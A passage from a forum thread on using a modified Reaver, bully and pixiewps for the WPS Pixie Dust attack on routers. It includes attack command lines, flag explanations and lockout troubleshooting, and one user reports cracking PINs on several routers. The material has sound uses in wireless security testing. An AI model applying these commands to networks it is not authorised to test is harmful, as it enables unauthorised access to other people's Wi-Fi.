    [Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
    [Reaver Test] [+] Channel: 11
    if such thing happens use bully to recover it
    example :
    bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
    it worked for me

    @Vinit2512 the RTL8671 is hackable (tested)
    Last edited by bahha; 2015-06-14 at 14:13.

  41. #91
    Join Date
    2015-Jun
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.
    Thanks soxrok2212, it worked

  42. #92
    Join Date
    2013-Jul
    Posts
    818
    To soxrok2212

    Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

    Which variable ie -vv or -vvv is supposed to provide all data?

    MTeams

  43. #93
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by mmusket33 View Post
    To soxrok2212

    Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

    Which variable ie -vv or -vvv is supposed to provide all data?

    MTeams
    Make sure you are actually running the version of reaver you compile...

    -vv will give you the standard Reaver 1.4 -vv output, Received M1, Sending M2, etc.

    -vvv will print all the pixie dust informations (PKE, PKR, E-Hash1, etc).

  44. #94
    Join Date
    2015-Jul
    Posts
    3
    hello.

    I managed to get 3 pins off 3 different routers but whenever reaver goes into second part of the cracking just hangs at test channel, and I check airodump the router no longer has wps enable/showing like turn off when i got pin.
    is there way re-enable? they were on as before I try reaver them.

  45. #95
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by contevo View Post
    hello.

    I managed to get 3 pins off 3 different routers but whenever reaver goes into second part of the cracking just hangs at test channel, and I check airodump the router no longer has wps enable/showing like turn off when i got pin.
    is there way re-enable? they were on as before I try reaver them.
    Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?

  46. #96
    Join Date
    2015-Jul
    Posts
    3
    Quote Originally Posted by soxrok2212 View Post
    Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?
    I cant get chipset on it because on those router as soon reaver cracked the pin they are no longer showing wps enable, and i waited for whole day maybe they will come on again but nope.

  47. #97
    Join Date
    2015-Mar
    Posts
    141
    Ported to Android!

    Will update soon with link to build script on my github.

    Binaries of pixiewps and t6x-reaver.

    http://www.mediafire.com/download/bw...android.tar.gz
    Last edited by aanarchyy; 2015-08-22 at 23:56.

  48. #98
    Join Date
    2015-Aug
    Posts
    5
    having problems with the prereqs

    oot@kali:~# apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzipReading package lists... Done
    Building dependency tree
    Reading state information... Done
    libssl-dev is already the newest version.
    unzip is already the newest version.
    unzip set to manually installed.
    sqlite3 is already the newest version.
    sqlite3 set to manually installed.
    Some packages could not be installed. This may mean that you have
    requested an impossible situation or if you are using the unstable
    distribution that some required packages have not yet been created
    or been moved out of Incoming.
    The following information may help to resolve the situation:

    The following packages have unmet dependencies:
    libpcap-dev : Depends: libpcap0.8-dev but it is not going to be installed
    libsqlite3-dev : Depends: libsqlite3-0 (= 3.7.16.2-1~bpo70+1) but 3.8.7.1-1+deb8u1 is to be installed
    E: Unable to correct problems, you have held broken packages.

  49. #99
    Join Date
    2015-Nov
    Location
    Russia
    Posts
    6
    what is force mode?
    "Try again with --force or with another (newer) set of data"
    and how should I use it?

  50. #100
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by ravenwest View Post
    what is force mode?
    "Try again with --force or with another (newer) set of data"
    and how should I use it?
    https://github.com/wiire/pixiewps
    If the following message is shown:

    [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

    then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.
    Last edited by Laserman75; 2015-11-25 at 01:11.

Similar Threads

  1. Reaver modfication for Pixie Dust Attack
    By t6_x in forum General Archive
    Replies: 81
    Last Post: 2015-05-05, 00:55
  2. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •